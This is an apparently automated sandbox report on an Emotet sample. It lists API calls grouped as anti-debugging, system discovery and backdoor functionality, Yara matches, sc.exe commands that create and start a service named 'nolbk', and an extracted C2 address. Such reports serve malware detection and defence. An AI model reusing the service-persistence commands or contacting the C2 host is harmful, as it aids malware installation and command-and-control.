Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_001F1743 mov eax, dword ptr fs:[00000030h]10_2_001F1743
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_006512CD mov eax, dword ptr fs:[00000030h]10_2_006512CD
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00651E04 mov eax, dword ptr fs:[00000030h]10_2_00651E04
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_004010D2 mov eax, dword ptr fs:[00000030h]11_2_004010D2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F0467 mov eax, dword ptr fs:[00000030h]11_2_001F0467
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F0C0C mov eax, dword ptr fs:[00000030h]11_2_001F0C0C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_001F1743 mov eax, dword ptr fs:[00000030h]11_2_001F1743
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00376956 GetProcessHeap,7_2_00376956
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371D7B SetUnhandledExceptionFilter,7_2_00371D7B
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371C60 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00371C60
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_0037435B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0037435B
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_003717BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_003717BE
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer,8_2_0043D4B8
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043A174
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0044288C
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00432A57
Source: C:\Windows\Temp\setup.exeCode function: 8_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter,8_2_0043D4DA
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer,9_2_0043D4B8
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043A174
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0044288C
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00432A57
Source: C:\Windows\Temp\setup.exeCode function: 9_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter,9_2_0043D4DA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer,10_2_0043D4B8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0043A174
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0044288C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00432A57
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter,10_2_0043D4DA
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer,11_2_0043D4B8
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043A174
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0044288C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00432A57
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter,11_2_0043D4DA

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start nolbk Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,8_2_00450149
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,8_2_0045040D
Source: C:\Windows\Temp\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,8_2_0044299D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,8_2_00452A2D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,8_2_00454AC1
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,8_2_00452B68
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,8_2_00452BA3
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_00452CE0
Source: C:\Windows\Temp\setup.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,8_2_00410CB2
Source: C:\Windows\Temp\setup.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,8_2_0045B31C
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,8_2_0044F836
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,8_2_00451A2B
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,8_2_00451B0D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,8_2_00451BA3
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_00451C15
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_00451DE5
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,8_2_0044FEC5
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00451ED0
Source: C:\Windows\Temp\setup.exeCode function: _strlen,EnumSystemLocalesA,8_2_00451EA7
Source: C:\Windows\Temp\setup.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_00451F71
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00451F35
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,9_2_00450149
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,9_2_0045040D
Source: C:\Windows\Temp\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,9_2_0044299D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,9_2_00452A2D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,9_2_00454AC1
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,9_2_00452B68
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,9_2_00452BA3
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_00452CE0
Source: C:\Windows\Temp\setup.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_00410CB2
Source: C:\Windows\Temp\setup.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_0045B31C
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,9_2_0044F836
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,9_2_00451A2B
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,9_2_00451B0D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,9_2_00451BA3
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_00451C15
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_00451DE5
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,9_2_0044FEC5
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_00451ED0
Source: C:\Windows\Temp\setup.exeCode function: _strlen,EnumSystemLocalesA,9_2_00451EA7
Source: C:\Windows\Temp\setup.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,9_2_00451F71
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_00451F35
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,10_2_00450149
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,10_2_0045040D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,10_2_0044299D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,10_2_00452A2D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,10_2_00454AC1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,10_2_00452B68
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,10_2_00452BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00452CE0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,10_2_00410CB2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,10_2_0045B31C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_0044F836
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,10_2_00451A2B
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,10_2_00451B0D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,10_2_00451BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_2_00451C15
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_00451DE5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,10_2_0044FEC5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_00451ED0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,EnumSystemLocalesA,10_2_00451EA7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,10_2_00451F71
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_00451F35
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,11_2_00450149
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,11_2_0045040D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,11_2_0044299D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,11_2_00452A2D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,11_2_00454AC1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,11_2_00452B68
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,11_2_00452BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_00452CE0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_00410CB2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_0045B31C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,11_2_0044F836
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,11_2_00451A2B
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,11_2_00451B0D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,11_2_00451BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_00451C15
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_00451DE5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,11_2_0044FEC5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_00451ED0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,EnumSystemLocalesA,11_2_00451EA7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,11_2_00451F71
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_00451F35
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371E8B cpuid 7_2_00371E8B
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\Temp\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msradvb.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\service.exeCode function: 7_2_00371B49 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00371B49
Contains functionality to query time zone informationShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00445DF7 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,8_2_00445DF7
Contains functionality to query windows versionShow sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00426264 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,8_2_00426264
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\msradvb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00404963 CreateBindCtx,CoTaskMemFree,8_2_00404963
Source: C:\Windows\Temp\setup.exeCode function: 8_2_00405D0F __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,8_2_00405D0F
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00404963 CreateBindCtx,CoTaskMemFree,9_2_00404963
Source: C:\Windows\Temp\setup.exeCode function: 9_2_00405D0F __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,9_2_00405D0F
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00404963 CreateBindCtx,CoTaskMemFree,10_2_00404963
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 10_2_00405D0F __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,10_2_00405D0F
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00404963 CreateBindCtx,CoTaskMemFree,11_2_00404963
Source: C:\Windows\SysWOW64\msradvb.exeCode function: 11_2_00405D0F __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,11_2_00405D0F

Malware Configuration

Threatname: Emotet

{"C2 list": ["108.6.140.26/HgsN9LrPL"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
